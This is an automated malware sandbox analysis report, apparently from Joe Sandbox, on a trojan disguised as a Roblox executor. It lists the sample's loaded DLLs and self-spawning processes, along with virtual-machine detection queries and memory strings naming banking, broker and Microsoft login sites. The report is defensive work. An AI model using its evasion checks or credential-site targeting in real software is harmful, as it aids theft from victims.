Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0043DAC5	6_2_0043DAC5
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_004287C5	6_2_004287C5
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0041DA80	6_2_0041DA80
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00412290	6_2_00412290
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0043E2B0	6_2_0043E2B0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0041536B	6_2_0041536B
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00415B6C	6_2_00415B6C
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0043CB72	6_2_0043CB72
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0040C321	6_2_0040C321
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0041B330	6_2_0041B330
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0040EBD0	6_2_0040EBD0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0041E3F0	6_2_0041E3F0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00404B90	6_2_00404B90
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_004073A0	6_2_004073A0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00436BB0	6_2_00436BB0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0041644B	6_2_0041644B
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0042D479	6_2_0042D479
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0042B8C3	6_2_0042B8C3
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0042EC22	6_2_0042EC22
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00432C30	6_2_00432C30
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0043ECC0	6_2_0043ECC0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_004094E0	6_2_004094E0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0042BCED	6_2_0042BCED
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0041848E	6_2_0041848E
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00445CA9	6_2_00445CA9
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00421D50	6_2_00421D50
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0040955D	6_2_0040955D
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00438560	6_2_00438560
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0041DD00	6_2_0041DD00
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0042FD39	6_2_0042FD39
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0043BDEE	6_2_0043BDEE
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00405D80	6_2_00405D80
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00417582	6_2_00417582
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00425D87	6_2_00425D87
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00422D94	6_2_00422D94
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0042B5A2	6_2_0042B5A2
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0042C5AC	6_2_0042C5AC
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00423DB0	6_2_00423DB0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00426DB6	6_2_00426DB6
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0041E660	6_2_0041E660
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00435E62	6_2_00435E62
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00414670	6_2_00414670
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0042C600	6_2_0042C600
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00436E10	6_2_00436E10
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0043E630	6_2_0043E630
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0040AE34	6_2_0040AE34
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0041F6E0	6_2_0041F6E0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_004386F9	6_2_004386F9
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00402E80	6_2_00402E80
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00414EA0	6_2_00414EA0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00417F48	6_2_00417F48
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_00437F50	6_2_00437F50
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0043DF60	6_2_0043DF60
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0041171D	6_2_0041171D
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0043571D	6_2_0043571D
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_004287C5	6_2_004287C5
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0040A7D0	6_2_0040A7D0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0043EFF0	6_2_0043EFF0
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_2_0040E7AC	6_2_0040E7AC

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: String function: 002F9BF0 appears 94 times
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: String function: 00414660 appears 70 times
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: String function: 0030670D appears 34 times
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: String function: 00301D28 appears 42 times
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: String function: 00407F30 appears 51 times

Source: Solara-Roblox-Executor-v3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Solara-Roblox-Executor-v3.exe	Static PE information: Section: .BSS ZLIB complexity 1.0003320970117846
Source: Solara-Roblox-Executor-v3.exe	Static PE information: Section: .BSS ZLIB complexity 1.0003320970117846

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/0@1/1

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Code function: 6_2_004374E0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

6_2_004374E0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Command line argument: T0		0_2_00305440
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Command line argument: T0		3_2_00305440

Source: Solara-Roblox-Executor-v3.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2063123407.0000000005795000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2052381585.0000000005799000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2052063015.00000000057B4000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

File read: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Process created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Process created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Process created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Process created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Process created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Process created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Process created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Process created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Solara-Roblox-Executor-v3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Solara-Roblox-Executor-v3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Solara-Roblox-Executor-v3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Solara-Roblox-Executor-v3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Solara-Roblox-Executor-v3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 0_2_002F9DAA push ecx; ret	0_2_002F9DBD
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 3_2_002F9DAA push ecx; ret	3_2_002F9DBD
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_03026773 push es; ret	6_3_030267BA
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_03026773 push es; ret	6_3_030267BA
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_03026773 push es; ret	6_3_030267BA
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_03026773 push es; ret	6_3_030267BA
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_03026773 push es; ret	6_3_030267BA
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_03026773 push es; ret	6_3_030267BA
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_03026773 push es; ret	6_3_030267BA
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_0302A071 push ds; retf	6_3_0302A072
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_0302A071 push ds; retf	6_3_0302A072
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_0302A071 push ds; retf	6_3_0302A072
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_0302A071 push ds; retf	6_3_0302A072
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_0302A071 push ds; retf	6_3_0302A072
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_0302A071 push ds; retf	6_3_0302A072
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_0302A071 push ds; retf	6_3_0302A072
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_02FC0F10 push esp; retf	6_3_02FC0F11
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_02FC0F10 push esp; retf	6_3_02FC0F11
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_02FC0F10 push esp; retf	6_3_02FC0F11
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_02FC0F10 push esp; retf	6_3_02FC0F11
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_02FC0F10 push esp; retf	6_3_02FC0F11
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_02FC0F10 push esp; retf	6_3_02FC0F11
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_02FC0F10 push esp; retf	6_3_02FC0F11
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_02FC0F10 push esp; retf	6_3_02FC0F11
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_03026773 push es; ret	6_3_030267BA
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_03026773 push es; ret	6_3_030267BA
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_03026773 push es; ret	6_3_030267BA
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_03026773 push es; ret	6_3_030267BA
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_03026773 push es; ret	6_3_030267BA
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_03026773 push es; ret	6_3_030267BA
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 6_3_03026773 push es; ret	6_3_030267BA

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe TID: 3716	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe TID: 3716	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 0_2_0030B6E8 FindFirstFileExW,	0_2_0030B6E8
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 0_2_0030B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_0030B799
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 3_2_0030B6E8 FindFirstFileExW,	3_2_0030B6E8
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Code function: 3_2_0030B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_0030B799

Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.0000000005833000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2050616380.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145247531.0000000002F7D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2050616380.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW#
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.0000000005833000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
